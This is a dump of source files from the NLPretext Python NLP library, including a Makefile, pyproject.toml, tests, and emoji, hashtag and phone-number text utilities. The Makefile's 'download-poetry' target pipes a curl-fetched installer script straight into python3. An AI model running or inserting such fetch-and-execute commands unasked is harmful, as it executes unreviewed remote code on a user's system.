30 | address, without explicit permission
31 | * Other conduct which could reasonably be considered inappropriate in a
32 | professional setting
33 |
34 | ## Our Responsibilities
35 |
36 | Project maintainers are responsible for clarifying the standards of acceptable
37 | behavior and are expected to take appropriate and fair corrective action in
38 | response to any instances of unacceptable behavior.
39 |
40 | Project maintainers have the right and responsibility to remove, edit, or
41 | reject comments, commits, code, wiki edits, issues, and other contributions
42 | that are not aligned to this Code of Conduct, or to ban temporarily or
43 | permanently any contributor for other behaviors that they deem inappropriate,
44 | threatening, offensive, or harmful.
45 |
46 | ## Scope
47 |
48 | This Code of Conduct applies both within project spaces and in public spaces
49 | when an individual is representing the project or its community. Examples of
50 | representing a project or community include using an official project e-mail
51 | address, posting via an official social media account, or acting as an appointed
52 | representative at an online or offline event. Representation of a project may be
53 | further defined and clarified by project maintainers.
54 |
55 | ## Enforcement
56 |
57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be
58 | reported by contacting the project team at rafaelle.aygalenq@artefact.com. All
59 | complaints will be reviewed and investigated and will result in a response that
60 | is deemed necessary and appropriate to the circumstances. The project team is
61 | obligated to maintain confidentiality with regard to the reporter of an incident.
62 | Further details of specific enforcement policies may be posted separately.
63 |
64 | Project maintainers who do not follow or enforce the Code of Conduct in good
65 | faith may face temporary or permanent repercussions as determined by other
66 | members of the project's leadership.
67 |
68 | ## Attribution
69 |
70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
72 |
73 | [homepage]: https://www.contributor-covenant.org
74 |
75 | For answers to common questions about this code of conduct, see
76 | https://www.contributor-covenant.org/faq
77 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | SHELL := /usr/bin/env bash
2 |
3 | IMAGE := nlpretext
4 | VERSION := latest
5 |
6 | NO_CHECK_FLAG = || true
7 |
8 | ifeq ($(STRICT), 1)
9 | POETRY_COMMAND_FLAG =
10 | PIP_COMMAND_FLAG =
11 | SAFETY_COMMAND_FLAG =
12 | BANDIT_COMMAND_FLAG =
13 | SECRETS_COMMAND_FLAG =
14 | BLACK_COMMAND_FLAG =
15 | DARGLINT_COMMAND_FLAG =
16 | ISORT_COMMAND_FLAG =
17 | MYPY_COMMAND_FLAG =
18 | else
19 | POETRY_COMMAND_FLAG = $(NO_CHECK_FLAG)
20 | PIP_COMMAND_FLAG = $(NO_CHECK_FLAG)
21 | SAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG)
22 | BANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG)
23 | SECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG)
24 | BLACK_COMMAND_FLAG = $(NO_CHECK_FLAG)
25 | DARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG)
26 | ISORT_COMMAND_FLAG = $(NO_CHECK_FLAG)
27 | MYPY_COMMAND_FLAG = $(NO_CHECK_FLAG)
28 | endif
29 |
30 | ifeq ($(POETRY_STRICT), 1)
31 | POETRY_COMMAND_FLAG =
32 | else ifeq ($(POETRY_STRICT), 0)
33 | POETRY_COMMAND_FLAG = $(NO_CHECK_FLAG)
34 | endif
35 |
36 | ifeq ($(PIP_STRICT), 1)
37 | PIP_COMMAND_FLAG =
38 | else ifeq ($(PIP_STRICT), 0)
39 | PIP_COMMAND_FLAG = $(NO_CHECK_FLAG)
40 | endif
41 |
42 | ifeq ($(SAFETY_STRICT), 1)
43 | SAFETY_COMMAND_FLAG =
44 | else ifeq ($(SAFETY_STRICT), 0)
45 | SAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG)
46 | endif
47 |
48 | ifeq ($(BANDIT_STRICT), 1)
49 | BANDIT_COMMAND_FLAG =
50 | else ifeq ($(BANDIT_STRICT), 0)
51 | BANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG)
52 | endif
53 |
54 | ifeq ($(SECRETS_STRICT), 1)
55 | SECRETS_COMMAND_FLAG =
56 | else ifeq ($(SECRETS_STRICT), 0)
57 | SECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG)
58 | endif
59 |
60 | ifeq ($(BLACK_STRICT), 1)
61 | BLACK_COMMAND_FLAG =
62 | else ifeq ($(BLACK_STRICT), 0)
63 | BLACK_COMMAND_FLAG = $(NO_CHECK_FLAG)
64 | endif
65 |
66 | ifeq ($(DARGLINT_STRICT), 1)
67 | DARGLINT_COMMAND_FLAG =
68 | else ifeq ($(DARGLINT_STRICT), 0)
69 | DARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG)
70 | endif
71 |
72 | ifeq ($(ISORT_STRICT), 1)
73 | ISORT_COMMAND_FLAG =
74 | else ifeq ($(ISORT_STRICT), 0)
75 | ISORT_COMMAND_FLAG = $(NO_CHECK_FLAG)
76 | endif
77 |
78 | ifeq ($(MYPY_STRICT), 1)
79 | MYPY_COMMAND_FLAG =
80 | else ifeq ($(MYPY_STRICT), 0)
81 | MYPY_COMMAND_FLAG = $(NO_CHECK_FLAG)
82 | endif
83 |
84 | .PHONY: download-poetry
85 | download-poetry:
86 | curl -sSL https://install.python-poetry.org | python3 -
87 |
88 | .PHONY: install
89 | install:
90 | poetry env use python3.10
91 | poetry lock -n
92 | poetry install -n
93 | ifneq ($(NO_PRE_COMMIT), 1)
94 | poetry run pre-commit install -t pre-commit -t pre-push
95 | endif
96 |
97 | .PHONY: check-safety
98 | check-safety:
99 | poetry check$(POETRY_COMMAND_FLAG) && \
100 | poetry run pip check$(PIP_COMMAND_FLAG) && \
101 | poetry run safety check --full-report$(SAFETY_COMMAND_FLAG) && \
102 | poetry run bandit -r nlpretext/$(BANDIT_COMMAND_FLAG)
103 |
104 | .PHONY: gitleaks
105 | gitleaks:
106 | commits="$$(git rev-list --ancestry-path $$(git rev-parse $$(git branch -r --sort=committerdate | tail -1))..$$(git rev-parse HEAD))"; \
107 | if [ "$${commits}" != "" ]; then docker run --rm -v $$(pwd):/code/ zricethezav/gitleaks --path=/code/ -v --commits=$$(echo $${commits} | paste -s -d, -)$(SECRETS_COMMAND_FLAG); fi;
108 |
109 | .PHONY: format-code
110 | format-code:
111 | poetry run pre-commit run --all
112 |
113 | .PHONY: test
114 | test:
115 | poetry run pytest
116 |
117 | .PHONY: lint
118 | lint: check-safety format-code test
119 |
120 | # Example: make docker VERSION=latest
121 | # Example: make docker IMAGE=some_name VERSION=1.0.4
122 | .PHONY: docker
123 | docker:
124 | @echo Building docker $(IMAGE):$(VERSION) ...
125 | docker build \
126 | -t $(IMAGE):$(VERSION) . \
127 | -f ./docker/Dockerfile
128 |
129 | # Example: make clean_docker VERSION=latest
130 | # Example: make clean_docker IMAGE=some_name VERSION=1.0.4
131 | .PHONY: clean_docker
132 | clean_docker:
133 | @echo Removing docker $(IMAGE):$(VERSION) ...
134 | docker rmi -f $(IMAGE):$(VERSION)
135 |
136 | .PHONY: clean_build
137 | clean_build:
138 | rm -rf build/
139 |
140 | .PHONY: clean
141 | clean: clean_build clean_docker
142 |
--------------------------------------------------------------------------------
/pyproject.toml:
--------------------------------------------------------------------------------
1 | # Poetry pyproject.toml: https://python-poetry.org/docs/pyproject/
2 |
3 | [build-system]
4 | requires = ["poetry_core>=1.0.0"]
5 | build-backend = "poetry.core.masonry.api"
6 |
7 | [tool.poetry]
8 | name = "nlpretext"
9 | version = "1.2.2"
10 | description = "All the goto functions you need to handle NLP use-cases, integrated in NLPretext"
11 | readme = "README.md"
12 | authors = [
13 | "artefactory "
14 | ]
15 | license = "Apache Software License 2.0"
16 | repository = "https://github.com/artefactory/NLPretext"
17 | homepage = "https://github.com/artefactory/NLPretext"
18 |
19 | # Keywords description https://python-poetry.org/docs/pyproject/#keywords
20 | keywords = [] # Update me
21 |
22 | # Pypi classifiers: https://pypi.org/classifiers/
23 | classifiers = [ # Update me
24 | "Development Status :: 3 - Alpha",
25 | "Intended Audience :: Developers",
26 | "Operating System :: OS Independent",
27 | "Topic :: Software Development :: Libraries :: Python Modules",
28 | ]
29 |
30 | [tool.poetry.scripts]
31 | # Entry points for the package https://python-poetry.org/docs/pyproject/#scripts
32 | "nlpretext" = "nlpretext.cli.__main__:app"
33 |
34 | [tool.poetry.dependencies]
35 | python = ">=3.8,<3.11"
36 | typer = {extras = ["all"], version = ">=0.3.2"}
37 | rich = ">=10.1"
38 | chardet = ">=3.0.4"
39 | emoji = ">=2.0.0"
40 | flashtext = ">=2.7"
41 | ftfy = ">=4.2.0"
42 | mosestokenizer = ">=1.1.0"
43 | nlpaug = ">=1.0.1"
44 | nltk = ">=3.4.2"
45 | numpy = "^1.22"
46 | phonenumbers = ">=8.10.12"
47 | regex = ">=2019.8.19"
48 | sacremoses = ">=0.0.13"
49 | scikit-learn = ">=0.23.2, <2"
50 | spacy = ">=3.0.5"
51 | pillow = ">=8.2.1"
52 | thinc = ">=8.0.4"
53 | stop-words = ">=2018.7.23"
54 | pandas = ">=1.3,<3.0"
55 | pyarrow = ">=4.0.0"
56 | fastparquet = ">=0.4.1"
57 | dask = {version = ">=2021.5.0", extras = ["complete"], optional = true}
58 | distributed = {version = ">=2021.5.0", extras = ["complete"], optional = true}
59 | tornado = ">=6.0.3"
60 | torch = {version = "^1.9.0", optional = true}
61 |
62 | [tool.poetry.group.dev.dependencies]
63 | isort = ">=5.8.0"
64 | pyupgrade = ">=2.12.0"
65 | black = ">=20.8b1"
66 | ruff = "^0.1.5"
67 | mypy = ">=0.812"
68 | bandit = ">=1.7.0"
69 | safety = ">=1.10.3"
70 | pytest = ">=6.2.1"
71 | pytest-cov = ">=2.10.1"
72 | coverage = ">=5.3"
73 | pre-commit = ">=2.12.0"
74 | mypy-extensions = ">=0.4.3"
75 | types-emoji = ">=1.2.2"
76 | types-chardet = ">=0.1.3"
77 | types-click = ">=7.1.2"
78 |
79 |
80 | [tool.poetry.group.docs.dependencies]
81 | nbsphinx = ">=0.8.0"
82 | notebook = ">=6.1.5"
83 | Pygments = ">=2.8.0"
84 | recommonmark=">=0.7.1"
85 | Sphinx = ">=3.5.4"
86 | sphinx-gallery = ">=0.8.1"
87 | sphinxcontrib-applehelp = ">=1.0.2"
88 | sphinxcontrib-devhelp = ">=1.0.2"
89 | sphinxcontrib-htmlhelp = ">=1.0.3"
90 | sphinxcontrib-jsmath = ">=1.0.1"
91 | sphinxcontrib-qthelp = ">=1.0.3"
92 | sphinxcontrib-serializinghtml = ">=1.1.4"
93 | sphinx-autodoc-typehints = ">=1.11.1"
94 | sphinx_rtd_theme = ">=0.5.2"
95 | sphinx-multiversion-pre-post-build = ">=0.2.4"
96 |
97 |
98 | [tool.poetry.extras]
99 | torch = ["torch"]
100 | dask = ["dask", "distributed"]
101 |
102 | [tool.black]
103 | # https://github.com/psf/black
104 | line-length = 100
105 | target-version = ["py38"]
106 |
107 | [tool.isort]
108 | # https://github.com/timothycrosley/isort/
109 | profile = "black"
110 | known_typing = "typing,types,typing_extensions,mypy,mypy_extensions"
111 | sections = "FUTURE,TYPING,STDLIB,THIRDPARTY,FIRSTPARTY,LOCALFOLDER"
112 | default_section = "FIRSTPARTY"
113 | force_grid_wrap = 0
114 | line_length = 100
115 |
116 |
117 | [tool.ruff]
118 | ignore = [
119 | "D100",
120 | "D101",
121 | "D106",
122 | "D205",
123 | "D400",
124 | "D415",
125 | "D401",
126 | ]
127 | line-length = 100
128 | select = ["B", "C", "D", "E", "F", "W"]
129 |
130 | [tool.ruff.pydocstyle]
131 | convention = "numpy"
132 |
133 | [tool.ruff.per-file-ignores]
134 | "*cli.py" = ["D", "B008"]
135 | "*__init__.py" = [
136 | "F401",
137 | "D100",
138 | "D101",
139 | "D103",
140 | "D104",
141 | "D105",
142 | "D106",
143 | "D107",
144 | ]
145 | "tests/*" = ["D", "E501"]
146 |
--------------------------------------------------------------------------------
/tests/test_file_loader.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 |
16 | import os
17 | import re
18 |
19 | import numpy as np
20 | import pytest
21 | from nlpretext._utils.file_loader import check_text_file_format, detect_encoding
22 |
23 | TESTDOC_LATIN1 = "J'aime les frites bien grasse étalon châpeau!"
24 | TESTDOC_UTF8 = "Un deuxième exemple de texte en utf-8 cette fois!"
25 |
26 |
27 | def create_files():
28 | encoded_s = TESTDOC_LATIN1.encode("latin-1")
29 | with open("testdoc_latin1.txt", "wb") as f:
30 | f.write(encoded_s)
31 |
32 | encoded_s = TESTDOC_UTF8.encode("utf-8")
33 | with open("testdoc_utf8.txt", "wb") as f:
34 | f.write(encoded_s)
35 | return True
36 |
37 |
38 | def test_detect_encoding():
39 | create_files()
40 | expected = {"encoding": "ISO-8859-1", "confidence": 0.73, "language": ""}
41 | result = detect_encoding("testdoc_latin1.txt")
42 | np.testing.assert_equal(result, expected)
43 | remove_files()
44 |
45 |
46 | def remove_files():
47 | os.remove("testdoc_latin1.txt")
48 | os.remove("testdoc_utf8.txt")
49 |
50 |
51 | @pytest.mark.parametrize(
52 | "input_filepath, raising, expected_str",
53 | [
54 | ("hello.csv", False, "csv"),
55 | ("folder/hello.csv", False, "csv"),
56 | ("gs://folder/hello.csv", False, "csv"),
57 | ("s3://folder/hello.csv", False, "csv"),
58 | ("hdfs://folder/hello.csv", False, "csv"),
59 | ("az://folder/hello.csv", False, "csv"),
60 | ("wildcards/*.csv", False, "csv"),
61 | ("compressed/gz/text.csv.gz", False, "csv"),
62 | ("compressed/zip/text.csv.zip", False, "csv"),
63 | (["hello.csv"], False, "csv"),
64 | (["hello.csv", "compressed.csv.gz"], False, "csv"),
65 | (["hello.csv", "other/folder/hello.csv"], False, "csv"),
66 | ("hello.json", False, "json"),
67 | ("folder/hello.json", False, "json"),
68 | ("gs://folder/hello.json", False, "json"),
69 | (["hello.json", "folder/hello.json"], False, "json"),
70 | ("hello.txt", False, "txt"),
71 | ("folder/hello.txt", False, "txt"),
72 | ("gs://folder/hello.txt", False, "txt"),
73 | (["hello.txt", "gs://folder/hello.txt"], False, "txt"),
74 | ("hello.parquet", False, "parquet"),
75 | ("folder/hello.parquet", False, "parquet"),
76 | ("gs://folder/hello.parquet", False, "parquet"),
77 | (["hello.parquet", "gs://folder/hello.parquet"], False, "parquet"),
78 | (
79 | "gs://folder/hello.notaformat",
80 | True,
81 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
82 | ),
83 | (
84 | "gs://folder/hello.gz",
85 | True,
86 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
87 | ),
88 | (
89 | "gs://folder/hello.zip",
90 | True,
91 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
92 | ),
93 | (
94 | "folder/*",
95 | True,
96 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
97 | ),
98 | (
99 | ["hello.txt", "gs://folder/hello.csv"],
100 | True,
101 | re.escape("Multiple file formats found in file path list: ['txt', 'csv']"),
102 | ),
103 | ],
104 | )
105 | def test_check_text_file_format(input_filepath, raising, expected_str):
106 | if raising:
107 | with pytest.raises(ValueError, match=expected_str):
108 | check_text_file_format(input_filepath)
109 | else:
110 | result = check_text_file_format(input_filepath)
111 | assert result == expected_str
112 |
--------------------------------------------------------------------------------
/nlpretext/social/preprocess.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 |
16 |
17 | from typing import List, Tuple
18 |
19 | import emoji as _emoji
20 | from nlpretext._config import constants
21 | from nlpretext.basic.preprocess import normalize_whitespace
22 |
23 |
24 | def remove_mentions(text: str) -> str:
25 | """
26 | Function that removes words preceded with a '@'.
27 |
28 | Parameters
29 | ----------
30 | text : str
31 |
32 | Returns
33 | -------
34 | string
35 | """
36 | text = normalize_whitespace(constants.AT_PATTERN.sub("", text))
37 | return text
38 |
39 |
40 | def extract_mentions(text: str) -> List[str]:
41 | """
42 | Function that extracts words preceded with a '@'
43 | eg. "I take care of my skin with @thisproduct" --> ["@thisproduct"].
44 |
45 | Parameters
46 | ----------
47 | text : str
48 |
49 | Returns
50 | -------
51 | string
52 | """
53 | return constants.AT_PATTERN.findall(text)
54 |
55 |
56 | def remove_html_tags(text: str) -> str:
57 | """
58 | Function that removes words between < and >.
59 |
60 | Parameters
61 | ----------
62 | text : str
63 |
64 | Returns
65 | -------
66 | string
67 | """
68 | text = normalize_whitespace(constants.HTML_TAG_PATTERN.sub("", text))
69 | return text
70 |
71 |
72 | def remove_emoji(text: str) -> str:
73 | """
74 | Remove emoji from any str by stripping any unicode in the range of Emoji unicode
75 | as defined in the unicode convention:
76 | http://www.unicode.org/emoji/charts/full-emoji-list.html.
77 |
78 | Parameters
79 | ----------
80 | text : str
81 |
82 | Returns
83 | -------
84 | str
85 | """
86 | text = _emoji.replace_emoji(text, "")
87 | return text
88 |
89 |
90 | # TODO: replace mutable default value :
91 | # https://docs.quantifiedcode.com/python-anti-patterns/correctness/mutable_default_value_as_argument.html
92 | def convert_emoji_to_text(text: str, code_delimiters: Tuple[str, str] = (":", ":")) -> str:
93 | """
94 | Convert emoji to their CLDR Short Name, according to the unicode convention
95 | http://www.unicode.org/emoji/charts/full-emoji-list.html
96 | eg. 😀 --> :grinning_face:
97 |
98 | Parameters
99 | ----------
100 | text : str
101 | code_delimiters : tuple of symbols around the emoji code.
102 | eg: (':',':') --> :grinning_face:
103 |
104 | Returns
105 | -------
106 | str
107 | string
108 | """
109 | return _emoji.demojize(text, delimiters=code_delimiters)
110 |
111 |
112 | def extract_emojis(text: str) -> List[str]:
113 | """
114 | Function that extracts emojis from a text and translates them into words
115 | eg. "I take care of my skin 😀 :(" --> [":grinning_face:"].
116 |
117 | Parameters
118 | ----------
119 | text : str
120 |
121 | Returns
122 | -------
123 | list
124 | list of all emojis converted with their unicode conventions
125 | """
126 | emojis_in_text = _emoji.emoji_list(text)
127 | emojis_converted = [
128 | convert_emoji_to_text(emoji_text.get("emoji", "")) for emoji_text in emojis_in_text
129 | ]
130 | return emojis_converted
131 |
132 |
133 | def extract_hashtags(text: str) -> List[str]:
134 | """
135 | Function that extracts words preceded with a '#'
136 | eg. "I take care of my skin #selfcare#selfestim" --> ["skincare", "selfestim"].
137 |
138 | Parameters
139 | ----------
140 | text : str
141 |
142 | Returns
143 | -------
144 | list
145 | list of all hashtags
146 | """
147 | return constants.HASHTAG_PATTERN.findall(text)
148 |
149 |
150 | def remove_hashtag(text: str) -> str:
151 | """
152 | Function that removes words preceded with a '#'
153 | eg. "I take care of my skin #selfcare#selfestim" --> "I take care of my skin".
154 |
155 | Parameters
156 | ----------
157 | text : str
158 |
159 | Returns
160 | -------
161 | str
162 | text of a post without hashtags
163 | """
164 | text = normalize_whitespace(constants.HASHTAG_PATTERN.sub("", text))
165 | return text
166 |
--------------------------------------------------------------------------------
/docs/make.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | REM Command file for Sphinx documentation
4 |
5 | if "%SPHINXBUILD%" == "" (
6 | set SPHINXBUILD=sphinx-build
7 | )
8 | set BUILDDIR=build
9 | set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
10 | if NOT "%PAPER%" == "" (
11 | set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
12 | )
13 |
14 | if "%1" == "" goto help
15 |
16 | if "%1" == "help" (
17 | :help
18 | echo.Please use `make ^` where ^ is one of
19 | echo. html to make standalone HTML files
20 | echo. dirhtml to make HTML files named index.html in directories
21 | echo. singlehtml to make a single large HTML file
22 | echo. pickle to make pickle files
23 | echo. json to make JSON files
24 | echo. htmlhelp to make HTML files and a HTML help project
25 | echo. qthelp to make HTML files and a qthelp project
26 | echo. devhelp to make HTML files and a Devhelp project
27 | echo. epub to make an epub
28 | echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
29 | echo. text to make text files
30 | echo. man to make manual pages
31 | echo. changes to make an overview over all changed/added/deprecated items
32 | echo. linkcheck to check all external links for integrity
33 | echo. doctest to run all doctests embedded in the documentation if enabled
34 | goto end
35 | )
36 |
37 | if "%1" == "clean" (
38 | for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
39 | del /q /s %BUILDDIR%\*
40 | goto end
41 | )
42 |
43 | if "%1" == "html" (
44 | %SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
45 | echo.
46 | echo.Build finished. The HTML pages are in %BUILDDIR%/html.
47 | goto end
48 | )
49 |
50 | if "%1" == "dirhtml" (
51 | %SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
52 | echo.
53 | echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
54 | goto end
55 | )
56 |
57 | if "%1" == "singlehtml" (
58 | %SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
59 | echo.
60 | echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
61 | goto end
62 | )
63 |
64 | if "%1" == "pickle" (
65 | %SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
66 | echo.
67 | echo.Build finished; now you can process the pickle files.
68 | goto end
69 | )
70 |
71 | if "%1" == "json" (
72 | %SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
73 | echo.
74 | echo.Build finished; now you can process the JSON files.
75 | goto end
76 | )
77 |
78 | if "%1" == "htmlhelp" (
79 | %SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
80 | echo.
81 | echo.Build finished; now you can run HTML Help Workshop with the ^
82 | .hhp project file in %BUILDDIR%/htmlhelp.
83 | goto end
84 | )
85 |
86 | if "%1" == "qthelp" (
87 | %SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
88 | echo.
89 | echo.Build finished; now you can run "qcollectiongenerator" with the ^
90 | .qhcp project file in %BUILDDIR%/qthelp, like this:
91 | echo.^> qcollectiongenerator %BUILDDIR%\qthelp\Mapnik.qhcp
92 | echo.To view the help file:
93 | echo.^> assistant -collectionFile %BUILDDIR%\qthelp\Mapnik.ghc
94 | goto end
95 | )
96 |
97 | if "%1" == "devhelp" (
98 | %SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
99 | echo.
100 | echo.Build finished.
101 | goto end
102 | )
103 |
104 | if "%1" == "epub" (
105 | %SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
106 | echo.
107 | echo.Build finished. The epub file is in %BUILDDIR%/epub.
108 | goto end
109 | )
110 |
111 | if "%1" == "latex" (
112 | %SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
113 | echo.
114 | echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
115 | goto end
116 | )
117 |
118 | if "%1" == "text" (
119 | %SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
120 | echo.
121 | echo.Build finished. The text files are in %BUILDDIR%/text.
122 | goto end
123 | )
124 |
125 | if "%1" == "man" (
126 | %SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
127 | echo.
128 | echo.Build finished. The manual pages are in %BUILDDIR%/man.
129 | goto end
130 | )
131 |
132 | if "%1" == "changes" (
133 | %SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
134 | echo.
135 | echo.The overview file is in %BUILDDIR%/changes.
136 | goto end
137 | )
138 |
139 | if "%1" == "linkcheck" (
140 | %SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
141 | echo.
142 | echo.Link check complete; look for any errors in the above output ^
143 | or in %BUILDDIR%/linkcheck/output.txt.
144 | goto end
145 | )
146 |
147 | if "%1" == "doctest" (
148 | %SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
149 | echo.
150 | echo.Testing of doctests in the sources finished, look at the ^
151 | results in %BUILDDIR%/doctest/output.txt.
152 | goto end
153 | )
154 |
155 | :end
156 |
--------------------------------------------------------------------------------
/nlpretext/_utils/phone_number.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 | from typing import List, Optional
19 |
20 | import phonenumbers as _phonenumbers
21 | from nlpretext._config.config import FORMAT_NUMBERS, SUPPORTED_COUNTRY
22 |
23 |
24 | def find_phone_numbers(string: str, region_code: Optional[str] = None) -> List[str]:
25 | """
26 | Python port of Google's libphonenumber.
27 | https://github.com/daviddrysdale/python-phonenumbers.
28 |
29 | Parameters
30 | ----------
31 | region_code : str, optional
32 | If specified, will find the number of the specified country.
33 | eg. 06.00.00.00.00 if "FR" is specified.
34 |
35 | If not specified, only works for international-formatted phone numbers.
36 | - ie. phone number with +country code specified
37 | eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.
38 | supported value: look SUPPORTED_COUNTRY variable.
39 |
40 | Returns
41 | -------
42 | list
43 | list of matched phone numbers.
44 |
45 | Raises
46 | ------
47 | ValueError
48 | if country code is not supported.
49 | """
50 | if region_code not in SUPPORTED_COUNTRY:
51 | raise ValueError("Please enter a valid contry code. See SUPPORTED_COUNTRY list.")
52 | return [match.raw_string for match in _phonenumbers.PhoneNumberMatcher(string, region_code)]
53 |
54 |
55 | def extract_phone_numbers(text: str, countrylist: List[Optional[str]]) -> List[str]:
56 | """
57 | Find phone numbers in a text, returns a list of phone numbers.
58 |
59 | Parameters
60 | ----------
61 | text : str
62 | countrylist : list (eg. [None,'FR','US','GB'])
63 | Look for phone numbers formatted according to the specified countlist.
64 | supported value: look SUPPORTED_COUNTRY variable.
65 |
66 | Returns
67 | -------
68 | list
69 | List of unique phone numbers found.
70 | """
71 | all_phone_numbers: List[str] = []
72 | for country in countrylist:
73 | new_numbers_founds = find_phone_numbers(text, region_code=country)
74 | all_phone_numbers.extend(new_numbers_founds)
75 | return list(set(all_phone_numbers))
76 |
77 |
78 | class PhoneParser:
79 | """
80 | Python port of Google's libphonenumber.
81 | https://github.com/daviddrysdale/python-phonenumbers.
82 | """
83 |
84 | def __init__(self):
85 | self.region_code = None
86 | self.text = None
87 | self.parsed_num: Optional[_phonenumbers.PhoneNumber] = None
88 |
89 | @property
90 | def parsed_num(self) -> Optional[_phonenumbers.PhoneNumber]:
91 | return self.__parsed_num
92 |
93 | @parsed_num.setter
94 | def parsed_num(self, value: Optional[_phonenumbers.PhoneNumber]) -> None:
95 | self.__parsed_num = value
96 |
97 | def parse_number(
98 | self, text: str, region_code: Optional[str] = None
99 | ) -> Optional[_phonenumbers.PhoneNumber]:
100 | """
101 | Extract phone number from text.
102 |
103 | Parameters
104 | ----------
105 | text: str
106 | region_code : str, optional
107 | If specified, will find the number of the specified country.
108 | eg. 06.00.00.00.00 if "FR" is specified.
109 | If not specified, only works for international-formatted phone numbers.
110 | - ie. phone number with +country code specified
111 | eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.
112 | supported value: look SUPPORTED_COUNTRY variable.
113 |
114 | Returns
115 | -------
116 | str
117 | The parsed number
118 |
119 | Raises
120 | ------
121 | NumberParseException
122 | If the string doesn't contains phone number of is the parser fails.
123 | """
124 | self.region_code = region_code
125 | self.text = text
126 | self.parsed_num: Optional[_phonenumbers.PhoneNumber] = _phonenumbers.parse(
127 | self.text, self.region_code
128 | )
129 | return self.parsed_num
130 |
131 | def format_number(self, num_format: str) -> str:
132 | """
133 | Convert a phone number to another standard format.
134 |
135 | Parameters
136 | ----------
137 | num_format : str {'E164','INTERNATIONAL','NATIONAL','RFC3966'}
138 |
139 | Returns
140 | -------
141 | str
142 | Number formatted
143 | """
144 | standard_format = FORMAT_NUMBERS.get(num_format)
145 | if standard_format is None:
146 | raise ValueError(f"Please choose a num_format in {list(FORMAT_NUMBERS.keys())}")
147 | if self.parsed_num is None:
148 | raise ValueError(f"Could not parse phone number {self.parsed_num}")
149 | formatted_number: Optional[str] = _phonenumbers.format_number(
150 | self.parsed_num, standard_format
151 | )
152 | if formatted_number is None:
153 | raise ValueError(f"Could not format phone number {formatted_number}")
154 | return formatted_number
155 |
--------------------------------------------------------------------------------
